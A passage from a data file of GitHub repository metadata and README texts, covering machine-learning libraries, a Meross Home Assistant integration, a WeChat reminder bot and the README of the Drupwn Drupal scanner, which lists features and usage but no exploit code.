Machine](http://www.extreme-learning-machines.org) [1][2] in Python, based on [scikit-learn](http://scikit-learn.org).\n\n###### From the abstract:\n\n> It is clear that the learning speed of feedforward neural networks is in general far slower than required and it has been a major bottleneck in their applications for past decades. Two key reasons behind may be: 1) the slow gradient- based learning algorithms are extensively used to train neural networks, and 2) all the parameters of the networks are tuned iteratively by using such learning algorithms. Unlike these traditional implementations, this paper proposes a new learning algorithm called extreme learning machine (ELM) for single- hidden layer feedforward neural networks (SLFNs) which ran- domly chooses the input weights and analytically determines the output weights of SLFNs. In theory, this algorithm tends to provide the best generalization performance at extremely fast learning speed. The experimental results based on real- world benchmarking function approximation and classification problems including large complex applications show that the new algorithm can produce best generalization performance in some cases and can learn much faster than traditional popular learning algorithms for feedforward neural networks.\n\nIt's a work in progress, so things can/might/will change.\n\n__David C. Lambert__ \n__dcl [at] panix [dot] com__ \n\n__Copyright \u00a9 2013__ \n__License: Simple BSD__\n\nFiles\n-----\n#### __random_layer.py__\n\nContains the __RandomLayer__, __MLPRandomLayer__, __RBFRandomLayer__ and __GRBFRandomLayer__ classes.\n\nRandomLayer is a transformer that creates a feature mapping of the\ninputs that corresponds to a layer of hidden units with randomly \ngenerated components.\n\nThe transformed values are a specified function of input activations\nthat are a weighted combination of dot product (multilayer perceptron)\nand distance (rbf) activations:\n\n\t input_activation = alpha * mlp_activation + (1-alpha) * rbf_activation\n\n\t mlp_activation(x) = dot(x, weights) + bias\n\t rbf_activation(x) = rbf_width * ||x - center||/radius\n\n_mlp_activation_ is multi-layer perceptron input activation \n\n_rbf_activation_ is radial basis function input activation\n\n_alpha_ and _rbf_width_ are specified by the user\n\n_weights_ and _biases_ are taken from normal distribution of\nmean 0 and sd of 1\n\n_centers_ are taken uniformly from the bounding hyperrectangle\nof the inputs, and\n\n\tradius = max(||x-c||)/sqrt(n_centers*2)\n\n(All random components can be supplied by the user by providing entries in the dictionary given as the _user_components_ parameter.)\n\nThe input activation is transformed by a transfer function that defaults\nto numpy.tanh if not specified, but can be any callable that returns an\narray of the same shape as its argument (the input activation array, of\nshape [n_samples, n_hidden]).\n\nTransfer functions provided are:\n\n*\tsine\n*\ttanh\n*\ttribas\n*\tinv_tribas\n*\tsigmoid\n*\thardlim\n*\tsoftlim\n*\tgaussian\n*\tmultiquadric\n*\tinv_multiquadric\n\nMLPRandomLayer and RBFRandomLayer classes are just wrappers around the RandomLayer class, with the _alpha_ mixing parameter set to 1.0 and 0.0 respectively (for 100% MLP input activation, or 100% RBF input activation)\n\t\nThe RandomLayer, MLPRandomLayer, RBFRandomLayer classes can take a callable user\nprovided transfer function. See the docstrings and the example ipython\nnotebook for details.\n\nThe GRBFRandomLayer implements the Generalized Radial Basis Function from [[3]](http://sci2s.ugr.es/keel/pdf/keel/articulo/2011-Neurocomputing1.pdf)\n\n#### __elm.py__\n\nContains the __ELMRegressor__, __ELMClassifier__, __GenELMRegressor__, and __GenELMClassifier__ classes.\n\nGenELMRegressor and GenELMClassifier both take *RandomLayer instances as part of their contructors, and an optional regressor (conforming to the sklearn API)for performing the fit (instead of the default linear fit using the pseudo inverse from scipy.pinv2).\nGenELMClassifier is little more than a wrapper around GenELMRegressor that binarizes the target array before performing a regression, then unbinarizes the prediction of the regressor to make its own predictions.\n\nThe ELMRegressor class is a wrapper around GenELMRegressor that uses a RandomLayer instance by default and exposes the RandomLayer parameters in the constructor. ELMClassifier is similar for classification.\n\n#### __plot_elm_comparison.py__\n\nA small demo (based on scikit-learn's plot_classifier_comparison) that shows the decision functions of a couple of different instantiations of the GenELMClassifier on three different datasets.\n\n#### __elm_notebook.py__\n\nAn IPython notebook, illustrating several ways to use the __\\*ELM\\*__ and __\\*RandomLayer__ classes.\n\nRequirements\n------------\n\nWritten using Python 2.7.3, numpy 1.6.1, scipy 0.10.1, scikit-learn 0.13.1 and ipython 0.12.1\n\nReferences\n----------\n```\n[1] http://www.extreme-learning-machines.org\n\n[2] G.-B. Huang, Q.-Y. Zhu and C.-K. Siew, \"Extreme Learning Machine:\n Theory and Applications\", Neurocomputing, vol. 70, pp. 489-501,\n 2006.\n \n[3] Fernandez-Navarro, et al, \"MELM-GRBF: a modified version of the \n extreme learning machine for generalized radial basis function \n neural networks\", Neurocomputing 74 (2011), 2502-2510\n```\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "albertogeniola/meross-homeassistant", "link": "https://github.com/albertogeniola/meross-homeassistant", "tags": ["meross", "homeassistant", "meross-homeassistant"], "stars": 514, "description": "Custom component that leverages the Meross IoT library to integrate with Homeassistant", "lang": "Python", "repo_lang": "", "readme": "[![hacs_badge](https://img.shields.io/badge/HACS-Default-orange.svg?style=for-the-badge)](https://github.com/hacs/integration)\n![Build](https://img.shields.io/azure-devops/build/albertogeniola/c4128d1b-c23c-418d-95c5-2de061954ee5/3/master?style=for-the-badge)\n\n## \ud83d\udca3\ud83d\udca3 BREAKING CHANGES FROM MEROSS API \ud83d\udca3\ud83d\udca3\nIn the past 24 hours, Meross has changed the signature of its HTTP API version (keeping the same API version in place). \n**That did break every HomeAssistant integration version below 1.2.6 (included).**\nIn order to solve the issue, you should upgrade to version **1.2.8** which includes the necessary changes to work again with the updated version of the Meross APIs.\n\n# Meross HomeAssistant component\nA full-featured Homeassistant component to drive Meross devices. \nThis component is based on the underlying MerossIot library available [here](https://github.com/albertogeniola/MerossIot).\n\n## Installation & configuration\nYou can install this component in two ways: via HACS or manually.\nHACS is a nice community-maintained components manager, which allows you to install git-hub hosted components in a few clicks.\nIf you have already HACS installed on your HomeAssistant, it's better to go with that.\nOn the other hand, if you don't have HACS installed or if you don't plan to install it, then you can use manual installation.\n\n### Option A: Installing via HACS\nIf you have HACS, well, it's piece of cake! \nJust search for \"Meross\" (Full name is Meross Cloud IoT) in the default repository of HACS and it'll show up.\nClick on Install. When the installation completes, **you must restart homeassistant** in order to make it work.\nAs soon as HomeAssistant is restarted, you can proceed with __component setup__.\n\n### Option B: Classic installation (custom_component)\n1. Download the latest zip release archive from [here](https://github.com/albertogeniola/meross-homeassistant/releases/latest)\n1. Unzip/copy the meross_cloud directory within the `custom_components` directory of your homeassistant installation.\nThe `custom_components` directory resides within your homeassistant configuration directory.\nUsually, the configuration directory is within your home (`~/.homeassistant/`).\nIn other words, the configuration directory of homeassistant is where the config.yaml file is located.\nAfter a correct installation, your configuration directory should look like the following.\n ```\n \u2514\u2500\u2500 ...\n \u2514\u2500\u2500 configuration.yaml\n \u2514\u2500\u2500 secrects.yaml\n \u2514\u2500\u2500 custom_components\n \u2514\u2500\u2500 meross_cloud\n \u2514\u2500\u2500 __init__.py\n \u2514\u2500\u2500 common.py\n \u2514\u2500\u2500 cover.py\n \u2514\u2500\u2500 ...\n ```\n\n **Note**: if the custom_components directory does not exist, you need to create it.\n\nAfter copy-pasting the meross_cloud directory into the custom_components folder, you need to restart HomeAssistant.\nAs soon as HomeAssistant is restarted, you can proceed with __component setup__.\n\n### Component setup \nOnce the component has been installed, you need to configure it in order to make it work.\nTo do so, navigate to \"Configuration -> Integrations -> Add Integration\" and look for \"Meross Cloud IoT\".\nAs soon as you add it, you'll be asked to configure it. \nThe following table summarizes the fields that the wizard will require you to fill in:\n\n| Field Name | Example Value | Description | \n|----------------------------------|-------------------------|---------------------------------------------------------|\n| HTTP Api Endpoint | https://iot.meross.com | Is the HTTP(s) API endpoint used by the Meross Manager. This might vary in accordance with your country | \n| Email Address | johndoe@gmail.com | Your Meross account username/email. If connecting to the official Meross cloud, use the same from the Meross App |\n| Password | R4nd0mS3cret | Your Meross account password. If connecting to the official Meross cloud, use the same from the Meross App |\n| Skip MQTT certificate validation | True (Checked) | Configures MQTT certificate validation. When unchecked it requires a valid certificate to be exposed from the Meross Server. If checked, it skips the MQTT certificate validation. If connecting to the official Meross cloud, you can uncheck this. When connecting to local-lan or custom MQTT brokers, you might want to check this. |\n\nThe following animation shows an example of component configuration\n[![Installation via web UI](https://raw.githubusercontent.com/albertogeniola/meross-homeassistant/master/docs/source/images/components/meross_cloud/install-via-webui.gif)](https://raw.githubusercontent.com/albertogeniola/meross-homeassistant/master/docs/source/images/components/meross_cloud/install-via-webui.gif)\n\n## Features\n### Massive support\nThis library supports all the Meross devices currently exposed by the Meross IoT library.\nIn particular Bulbs, Switches, Garage Door Openers and Smart Valves/Thermostat are fully supported and perfectly integrated with HomeAssistant.\n\n
\n Have a look a the screenshots below...\n\n\"User \n\"Controlling \n\"Controlling \n\"Power \n\"Controlling \n
\n \n## :new: :rocket: A first version of the Local-Only Addon is HERE! :rocket:\nIt took a bit, but eventually it's here. A very first **unstable** version of the Local Meross Addon has been developed.\nThe latest version of this component, v1.2.5rc1, does support it and has been tested successfully with both a MSS210 and a MSS310 devices.\nPlease note that the usage of the Local Addon is only advised for all the advanced users who are experiencing problems with Meross security\nteam, complaining about high rate API calls to their systems. If you plan to use such devices off-grid, the Local Addon is what you are\nlooking for. Again, be avised: it's still a work in progress and your devices might not work as expected (for now).\n\nYou can find installation instructions for the Local Addon directly [here](https://github.com/albertogeniola/ha-meross-local-broker).\n\n### What is the local-addon?\nMeross Plugin has gained great success and popularity among the HomeAssistant users. However, the Meross engineers are imposing\nnew limits on their MQTT broker system, which cause problems to the HA users who want to implement aggressive polling or have\nmore than 10 devices connected to HA. For this reason, I am working on a new HomeAssistant addon, namely \"Meross Local Addon\", \nwhich aims at re-implementing the Meross MQTT Broker and HTTP API layer locally to the addon. This would basically allow users\nto rely only on LAN-local connection, using HomeAssistant as command center. \n\n### How to use the this Meross Component with the Local Addon?\nIn order to take advantage of the Local Meross Addon, you need to follow the instructions below:\n1. Install or update the version of the Meross Custom Component via HACS (or manually, if you prefer) at least to version 1.2.5rc1, \nwhich is the first one supporting the Meross Local Addon.\n1. Add the Meross Local Addon repository to your HomeAssistant installation. You can do that following the [instructions here]([url](https://github.com/albertogeniola/ha-meross-local-broker)) or simply press the following button\n\n [![Open your Home Assistant instance and show the add add-on repository dialog with a specific repository URL pre-filled.](https://my.home-assistant.io/badges/supervisor_add_addon_repository.svg)](https://my.home-assistant.io/redirect/supervisor_add_addon_repository/?repository_url=https%3A%2F%2Fgithub.com%2Falbertogeniola%2Fha-meross-local-broker)\n1. Make sure the \"Meross Local Addon for Homeassistant\" appears in the section of \"community addons\" and, if so, install it. At the time of writing the latest\navailable version is *0.0.1-alpha42*. Depending on the HA hosting system and on the internect connection speed, it can take up to 20 minutes for the installation to complete.\n\n \n \n1. Navigate to the configuration section of the \"Meross Local Addon\" and make sure the option reinit_db is OFF, while the option \"advertise\" is ON. Leave debug_mode OFF, unless you need to provide supplementary logging information to debug issues. Make sure you don't have any firewall blocking the network traffic to the ports indicated on this section, as the addon will receive traffic from both meross devices and pairer app on such ports.\n \n \n1. Navigate to the \"info\" panel of the addon and make sure the \"Start at boot\" option is ON. Also, make sure the \"Show in menu\" option is set to ON. Then, start the ADDON and wait at least 5 minutes. Depending on the device you are running on, the first boot may take up to 10 minutes to complete.\n\n \n1. Open \"Meross Local Addon\" web-interface (you can either click on \"Open Web UI\" or click on the left menu icon . Then, from the web-ui, click on \"Wizard Setup\" or on \"Setup\" and follow the instructions to configure your addon. For now, it's advised not to use the \"Official Meross Link\", as it is still under development.\n\n \n \n\n1. The wizard will guide you through the Account Setup, Meross App installation and pairing process. Make sure you are able to pair at least one device.\n Note about Step 1, credentials setup: choose the username/password you will be using locally to pair your devices. If you don't plan to \"link\" the local addon to the official meross broker, you can choose whatever credentials you like. For instance, you can set: \n username: `meross@local`\n password: `changeme`\n1. When you have paired all the devices you want to manage locally, you can proceed with the setup of the Meross Component. \nNavigate to the HA integration list, and proceed with the installation of the Meross Addon. During the setup phase, make sure to select local addon setup option, not the one relying on the official Meross Broker.\n \n**NOTE**: sometimes, for yet-unknown reasons, MSS310 fails to pair with the local addon broker. However, resetting and retrying the pairing procedure a second time usually works. More recent devices, as the mss210, seem not to suffer of the same problem.\n\nAs you can imagine, there is a huge work behind that: first I need to reverse-engineer the Meross protocols, then I need to \nimplement any \"logic-layer\" implemented on Meross Systems on the new addon I am developing and, eventually, I have to make\nsure that everything works together. That means that I am not able to spend much time in solving issues that may arise in \nthe meantime, and for that I apologize. If you like this project and you want to support me, please consider donating:\nthat motivates me and helps me buy _more ram_ which is absolutely necessary when developing on a virtualized environment.\n\n## Supporting my work\nBy buying me a coffee, not only you make my development more efficient, but also motivate me to further improve \nmy work. On the other hand, buying me a beer will certainly make me happier: **a toast to you, supporter**!\nIn case you are a pro and a strong opensource supporter, you might also consider [sponsoring my GitHub work](https://github.com/sponsors/albertogeniola).\n\n[![Buy me a coffe!](https://www.buymeacoffee.com/assets/img/custom_images/black_img.png)](https://www.buymeacoffee.com/albertogeniola)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "LouisScorpio/datamining", "link": "https://github.com/LouisScorpio/datamining", "tags": [], "stars": 514, "description": "learn in datamining", "lang": "Python", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lucastabelini/LaneATT", "link": "https://github.com/lucastabelini/LaneATT", "tags": ["lane-detection", "deep-learning", "computer-vision", "pytorch"], "stars": 514, "description": "Code for the paper entitled \"Keep your Eyes on the Lane: Real-time Attention-guided Lane Detection\" (CVPR 2021)", "lang": "Python", "repo_lang": "", "readme": "
\n\n# LaneATT\n[![arXiv](https://img.shields.io/badge/arXiv-2010.12035-b31b1b.svg)](https://arxiv.org/abs/2010.12035)\n[![CVPR](https://img.shields.io/badge/CVPR-PDF-blue)](https://openaccess.thecvf.com/content/CVPR2021/html/Tabelini_Keep_Your_Eyes_on_the_Lane_Real-Time_Attention-Guided_Lane_Detection_CVPR_2021_paper.html)\n![Method overview](data/figures/method-overview.png \"Method overview\")\n
\n\nThis repository holds the source code for LaneATT, a novel state-of-the-art lane detection model proposed in the [paper](https://arxiv.org/abs/2010.12035) \"_Keep your Eyes on the Lane: Real-time Attention-guided Lane Detection_\", by [Lucas Tabelini](https://github.com/lucastabelini), [Rodrigo Berriel](http://rodrigoberriel.com), [Thiago M. Paix\u00e3o](https://sites.google.com/view/thiagopx), [Claudine Badue](http://www.inf.ufes.br/~claudine/), [Alberto F. De Souza](http://www.lcad.inf.ufes.br/team/index.php/Prof._Dr._Alberto_Ferreira_De_Souza), and [Thiago Oliveira-Santos](http://www.inf.ufes.br/~todsantos/home).\n\n**News (2021-03-01)**: Our paper presenting LaneATT has been accepted to CVPR'21.\n\n### Table of contents\n1. [Prerequisites](#1-prerequisites)\n2. [Install](#2-install)\n3. [Getting started](#3-getting-started)\n4. [Results](#4-results)\n5. [Code structure](#5-code-structure)\n6. [Citation](#6-Citation)\n\n\n### 1. Prerequisites\n- Python >= 3.5\n- PyTorch == 1.6, tested on CUDA 10.2. The models were trained and evaluated on PyTorch 1.6. When testing with other versions, the results (metrics) are slightly different.\n- CUDA, to compile the NMS code\n- Other dependencies described in `requirements.txt`\n\nThe versions described here were the lowest the code was tested with. Therefore, it may also work in other earlier versions, but it is not guaranteed (e.g., the code might run, but with different outputs).\n\n### 2. Install\nConda is not necessary for the installation, as you can see, I only use it for PyTorch and Torchvision.\nNevertheless, the installation process here is described using it.\n\n```bash\nconda create -n laneatt python=3.8 -y\nconda activate laneatt\nconda install pytorch==1.6 torchvision -c pytorch\npip install -r requirements.txt\ncd lib/nms; python setup.py install; cd -\n```\n\n### 3. Getting started\n#### Datasets\nFor a guide on how to download and setup each dataset, see [DATASETS.md](DATASETS.md).\n\n#### Training & testing\nTrain a model:\n```\npython main.py train --exp_name example --cfg example.yml\n```\nFor example, to train LaneATT with the ResNet-34 backbone on TuSimple, run:\n```\npython main.py train --exp_name laneatt_r34_tusimple --cfg cfgs/laneatt_tusimple_resnet34.yml\n```\nAfter running this command, a directory `experiments` should be created (if it does not already exists). Another\ndirectory `laneatt_r34_tusimple` will be inside it, containing data related to that experiment (e.g., model checkpoints, logs, evaluation results, etc)\n\nEvaluate a model:\n```\npython main.py test --exp_name example\n```\nThis command will evaluate the model saved in the last checkpoint of the experiment `example` (inside `experiments`).\nIf you want to evaluate another checkpoint, the `--epoch` flag can be used. For other flags, please see `python main.py -h`. To **visualize the predictions**, run the above command with the additional flag `--view all`.\n\n#### Reproducing a result from the paper\n0. Set up the dataset you want to reproduce the results on (as described in [DATASETS.md](DATASETS.md)).\n1. Download the zip containing all pretrained models and then unzip it at the code's root:\n```bash\ngdown \"https://drive.google.com/uc?id=1R638ou1AMncTCRvrkQY6I-11CPwZy23T\" # main experiments on TuSimple, CULane and LLAMAS (1.3 GB)\nunzip laneatt_experiments.zip\n```\n2. Run the evaluation (inference + metric computation):\n```bash\npython main.py test --exp_name $EXP_NAME\n```\nReplace `$EXP_NAME` with the name of a directory inside `experiments/`. For instance, if you want to reproduce the results using the ResNet-34 backbone on the TuSimple dataset, run:\n```bash\npython main.py test --exp_name laneatt_r34_tusimple\n```\nThe results on TuSimple and LLAMAS should match exactly the ones reported in the paper. The results on CULane will deviate in the order of 0.1% (as shown in the CULane table below), since the metric reported on the paper was computed with the official code (C++), while this script will compute it using our implementation (which is much faster and in Python). The official metric implementation is available [here](https://github.com/XingangPan/SCNN/tree/master/tools/lane_evaluation).\n\n### 4. Results\n![F1 vs. Latency for state-of-the-art methods on lane detection](data/figures/f1-vs-latency.png \"F1 vs. Latency for state-of-the-art methods on lane detection\")\n\n#### CULane\n\n| Backbone | F1, official impl. (%) | F1, our impl. (%) | FPS |\n| :--- | ---: | ---: | ---:|\n| ResNet-18 | 75.13 | 75.08 | 250 |\n| ResNet-34 | 76.68 | 76.66 | 171 |\n| ResNet-122 | 77.02 | 77.02 | 26 |\n\n\"F1, official impl.\" refers to the official CULane metric implementation in C++. \"F1, our impl\" refers to our implementation of the metric in Python. The results reported in the paper were computed using the [official metric implementation](https://github.com/XingangPan/SCNN/tree/master/tools/lane_evaluation)\n (requires OpenCV 2.4).\n [![CULane video](data/figures/culane_video.png \"CULane video\")](https://youtu.be/ghs93acwkBQ)\n\n#### TuSimple\n| Backbone | Accuracy (%) | FDR (%) | FNR (%) | F1 (%) | FPS |\n| :--- | ---: | ---: | ---: | ---: | ---:|\n| ResNet-18 | 95.57 | 3.56 | 3.01 | 96.71 | 250 |\n| ResNet-34 | 95.63 | 3.53 | 2.92 | 96.77 | 171 |\n| ResNet-122 | 96.10 | 4.64 | 2.17 | 96.06 | 26 |\n\nSince the TuSimple dataset is not sequential, no qualitative video is available.\n\n#### LLAMAS\n| Backbone | F1 (%) | Precision (%) | Recall (%) | FPS |\n| :--- | ---: | ---: | ---: | ---:|\n| ResNet-18 | 93.46 | 96.92 | 90.24 | 250 |\n| ResNet-34 | 93.74 | 96.79 | 90.88 | 171 |\n| ResNet-122 | 93.54 | 96.82 | 90.47 | 26 |\n\n [![LLAMAS video](data/figures/llamas_video.png \"LLAMAS video\")](https://youtu.be/1f_y4A-muMg)\n\nAdditional results can be seen in the paper.\n\n### 5. Code structure\n- **cfgs:** Default configuration files\n- **figures:** Images used in this repository\n- **lib**\n - **datasets**\n - **culane.py:** CULane annotation loader\n - **lane_dataset.py:** Transforms raw annotations from a `LaneDatasetLoader` into a format usable by the model\n - **lane_dataset_loader.py:** Abstract class that each dataset loader implements\n - **llamas.py:** LLAMAS annotation loader\n - **nolabel_dataset.py:** Used on data with no annotation available (or quick qualitative testing)\n - **tusimple.py:** TuSimple annotation loader\n - **models:**\n - **laneatt.py:** LaneATT implementation\n - **matching.py:** Utility function for ground-truth and proposals matching\n - **resnet.py:** Implementation of ResNet\n - **nms:** NMS implementation\n - **config.py:** Configuration loader\n - **experiment.py:** Tracks and stores information about each experiment\n - **focal_loss.py:** Implementation of Focal Loss\n - **lane.py:** Lane representation\n - **runner.py:** Training and testing loops\n- **utils**:\n - **culane_metric.py:** Unofficial implementation of the CULane metric. This implementation is faster than the oficial,\n however, it does not matches exactly the results of the official one (error in the order of 1e-4). Thus, it was used only during the model's development.\n For the results reported in the paper, the official one was used.\n - **gen_anchor_mask.py**: Computes the frequency of each anchor in a dataset to be used in the anchor filtering step\n - **gen_video.py:** Generates a video from a model's predictions\n - **llamas_metric.py**: Official implementation of the LLAMAS metric\n - **llamas_utils.py**: Utilities functions for the LLAMAS dataset\n - **speed.py:** Measure efficiency-related metrics of a model\n - **tusimple_metric.py**: Official implementation of the TuSimple metric\n - **viz_dataset.py**: Show images sampled from a dataset (post-augmentation)\n- **main.py:** Runs the training or testing phase of an experiment\n\n### 6. Citation\nIf you use this code in your research, please cite:\n\n```bibtex\n@InProceedings{tabelini2021cvpr,\n author = {Lucas Tabelini\n and Rodrigo Berriel\n and Thiago M. Paix\\~ao\n and Claudine Badue\n and Alberto Ferreira De Souza\n and Thiago Oliveira-Santos},\n title = {{Keep your Eyes on the Lane: Real-time Attention-guided Lane Detection}},\n booktitle = {Conference on Computer Vision and Pattern Recognition (CVPR)},\n year = {2021}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "immunIT/drupwn", "link": "https://github.com/immunIT/drupwn", "tags": [], "stars": 514, "description": "Drupal enumeration & exploitation tool", "lang": "Python", "repo_lang": "", "readme": "# Drupwn [v1.0.4]\n\n## Description\n\nDrupwn claims to provide an efficient way to gather drupal information.\n\nEnumeration\n[![asciicast](https://asciinema.org/a/5InNWAotigwM4bRscUi7yKAtt.svg)](https://asciinema.org/a/5InNWAotigwM4bRscUi7yKAtt)\n\nExploitation\n[![asciicast](https://asciinema.org/a/bZmopDt4lyix1D9sgxwQMCRfn.svg)](https://asciinema.org/a/bZmopDt4lyix1D9sgxwQMCRfn)\n\nFurther explaination on our [blog post article](https://www.immunit.ch/en/blog/2018/04/10/yet-another-drupal-scanner-drupwn-2/)\n\n## Supported tested version\n\n* Drupal 7\n* Drupal 8\n\n## Execution mode\n\nDrupwn can be run, using two seperate modes which are **enum** and **exploit**.\nThe enum mode allows performing enumerations whereas the exploit mode allows checking and exploiting CVEs.\n\n## Functionalities\n\n### Enum mode\n\n* User enumeration\n* Node enumeration\n* Default files enumeration\n* Module enumeration\n* Theme enumeration\n* Cookies support\n* User-Agent support\n* Basic authentication support\n* Request delay\n* Enumeration range\n* Logging\n* Socks and HTTP proxy support\n\n### Exploit mode\n\n* Vulnerability checker\n* CVE exploiter\n\n## Installation\n\n```bash\npip3 install -r requirements.txt\npython3 drupwn --help\n```\n\nor\n\n```bash\npython3 setup.py install\ndrupwn --help\n```\n\n## Usage\n\n```\n$ drupwn -h\n\n ____\n / __ \\_______ ______ _ ______\n / / / / ___/ / / / __ \\ | /| / / __ \\\n / /_/ / / / /_/ / /_/ / |/ |/ / / / /\n /_____/_/ \\__,_/ .___/|__/|__/_/ /_/\n /_/\n\nusage: drupwn [-h] [--mode MODE] [--target TARGET] [--users] [--nodes] [--modules] [--dfiles] [--themes]\n [--version VERSION] [--cookies COOKIES] [--thread THREAD]\n [--range RANGE] [--ua UA] [--bauth BAUTH]\n [--delay DELAY] [--log] [--update] \n [--proxy PROXY | --proxies PROXIES]\n\nDrupwn aims to automate drupal information gathering.\n\noptional arguments:\n -h, --help show this help message and exit\n --mode MODE enum|exploit\n --target TARGET hostname to scan\n --users user enumaration\n --nodes node enumeration\n --modules module enumeration\n --dfiles default files enumeration\n --themes theme enumeration\n --version VERSION Drupal version\n --cookies COOKIES cookies\n --thread THREAD threads number\n --range RANGE enumeration range\n --ua UA User Agent\n --bauth BAUTH Basic authentication\n --delay DELAY request delay\n --log file logging\n --update update plugins and themes\n --proxy PROXY [http|https|socks]://host:port\n --proxies PROXIES Proxies file\n```\n\n## Docker alternative\n\n### Official image\n\nYou can pull the official Drupwn image from the dockerhub registry using the following command:\n\n```\ndocker pull immunit/drupwn\n```\n\n### Build\n\nTo build the container, just use this command:\n\n```bash\ndocker build -t drupwn .\n```\n\nDocker will download the Alpine image and then execute the installation steps.\n\n> Be patient, the process can be quite long the first time.\n\n### Run\n\nOnce the build process is over, get and enjoy your new Drupal scanner\n\n```bash\ndocker run --rm -it drupwn --help\n```\n\n## Logging\n\nThe output generated is stored in the **/tmp/** folder.\nWhen using docker, run your container using the following option\n\n```bash\n-v YOUR_PATH_FOLDER:/tmp/\n```\n\n## Enhancement\n\nTo add a new module, follow the template used in the *User.py* file.\nThen, add a reference in the Parser as well as in the Dispatcher in order to ensure its support by the reflective factory.\n\n## Disclaimer of Warranty\n\nDrupwn is provided under this License on an \"as is\" basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the Drupwn is free of defects, merchantable, fit for a particular purpose or non-infringing.\n\n## Disclaimer\n\nRunning Drupwn against websites without prior mutual consent may be illegal in your country. The ImmunIT Team accept no liability and are not responsible for any misuse or damage caused by Drupwn.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "13812851221/-rxrw-daily_morning", "link": "https://github.com/13812851221/-rxrw-daily_morning", "tags": [], "stars": 514, "description": null, "lang": "Python", "repo_lang": "", "readme": "# Daily good morning push to other people's girlfriends\n\nIt was first published in Xiaohongshu, but some people said that they could not read clearly, so here is an instruction manual.\n\n> I was stunned and heard in the new group of Xiaohongshu that some netizens were helping me promote this project on Douyin..\n>\n> Thanks a lot for this as I'm too lazy to do a video. . It was also a whim at the time, so I only published Xiaohongshu. .\n>\n> I am really grateful that everyone likes my project, but some friends say that I cannot be found. I am still very interested in gaining fans. .\n\n*My Little Red Book nickname==Douyin nickname==Weibo account==all social platforms==\"Tangled in Power\"*\n\nAnd they are all Conan's avatars\n\n![WechatIMG1](https://user-images.githubusercontent.com/9566402/185802023-1f28c90a-40e7-446e-8dad-420c83f83e38.jpeg)\n![WechatIMG2](https://user-images.githubusercontent.com/9566402/185802026-ef7c1b99-66a8-4535-a6a4-804677657667.jpeg)\n\n---------------------- The following is the text ----------------------\n\nWhen I was just trying to conceive this tutorial how to get friends who don't know programming to get started quickly, I considered: avoid server construction, avoid scheduled tasks, and avoid touching code. After going through all kinds of thinking, I feel that Github Actions can be used for free prostitution. .\n\nThe effect is as shown in the figure. Of course, the text can be modified.\n![5e72e89fd7ff692a0bfa62010517c0c](https://user-images.githubusercontent.com/9566402/183242263-c93517a2-5377-435d-8386-8d47252c9e07.jpg)\n\nFirst of all, search by picture, test number, and scan the QR code on WeChat to log in!\n![cf7dbd4502df44765ed3506f55caea5](https://user-images.githubusercontent.com/9566402/183242272-134e37e7-718d-42dd-9ed7-fca2810e94e6.png)\n\nClick Use this template according to the picture to create it under your own warehouse!\n![e6581c43572b00b12c1a82ca8d7178b](https://user-images.githubusercontent.com/9566402/183242340-2ef26c63-1ca1-420e-abd4-8672c25d61c9.png)\n\nAs shown in the figure below, create a template, set variables, and create various strings on the WeChat public platform into GitHub -> Settings -> Secrets -> Actions according to the instructions.\n![71bf9d11a876d23ef0f0728645a8ba0](https://user-images.githubusercontent.com/9566402/183242301-fd6ab30e-bfe5-4245-b2a9-f690184db307.png)\n![381e8ee4a7c5ec6b8c09719f2c7e486](https://user-images.githubusercontent.com/9566402/183242295-4dcf06bb-2083-4883-8745-0af753ca805c.png)\n![48c60750cec7adc546e0ad99e3082b3](https://user-images.githubusercontent.com/9566402/183242320-18500adc-14e5-4522-a3ad-ae19cc4479bf.png)\n\nEnable the Action under your own project!\n![30a5b1b2b06ba4a40a3d8ef01652409](https://user-images.githubusercontent.com/9566402/183242334-9943c538-ba3d-4d01-8377-d040143b7560.png)\n\nIf there is an error in the operation, you can see the error according to the following methods. You can also ask questions here or in the Xiaohongshu group\n![6b0da6f44e18c2bfd94910c377d13e6](https://user-images.githubusercontent.com/9566402/183242349-1aa5ada6-2ee7-4cf9-a542-4b2dad88b8fe.png)\n\nAfter enabling it, you can run it directly to see if your girlfriend's mobile phone has received the push!\nThis timed task is pushed at 8:00 every morning. Students who can program can customize some things by themselves~\n\nThe operations in the figure, except for the different English strings and the Chinese in the template message, should be the same, otherwise the programThe sequence doesn't work~\n\nIn the upper right corner of Github, you can click star to give me some encouragement, dear\n\nFollow and like on Xiaohongshu, if you have any interesting things, you can at me, and I will teach you how to do it\n\nps. There are some notes to add here\n\n1. The app secret given by the test account of the WeChat public platform for the first time is wrong, just refresh the page\n2. The date format for birthdays is `05-20`, and the format for anniversaries is `2022-08-09`, please pay attention to the distinction. For cities, please write prefecture-level cities, such as: `Beijing`, `Guangzhou`, `Chengde`\n3. The various English strings pasted in the variable should not have spaces or newlines, except for templates.\n4. The scheduled task of Github Actions is defined in the workflow as `0 0 * * *`, which is zero o'clock in UTC time and eight o'clock in Beijing time. But because Github has too many tasks at the same time, there will be a delay\n5. I will occasionally optimize the code, emm, but now I am working on a complete platform project, and I want to make it easier for everyone to get started\n\nBut that platform isn't quite there yet, and I'm going to curb my desire to make money (it's not). .", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Cisco-Talos/mutiny-fuzzer", "link": "https://github.com/Cisco-Talos/mutiny-fuzzer", "tags": [], "stars": 514, "description": null, "lang": "Python", "repo_lang": "", "readme": "# Quickstart: Mutiny tutorial\n\nBlog post here:\n* http://blog.talosintelligence.com/2018/01/tutorial-mutiny-fuzzing-framework-and.html\n\nLinks to this YouTube video demo:\n* https://www.youtube.com/watch?v=FZyR6MgJCUs\n\nFor more features geared towards fuzzing campaigns/feedback/harnesses:\n* https://github.com/Cisco-Talos/mutiny-fuzzer/tree/experiment\n\n# Mutiny Fuzzing Framework\n\nThe Mutiny Fuzzing Framework is a 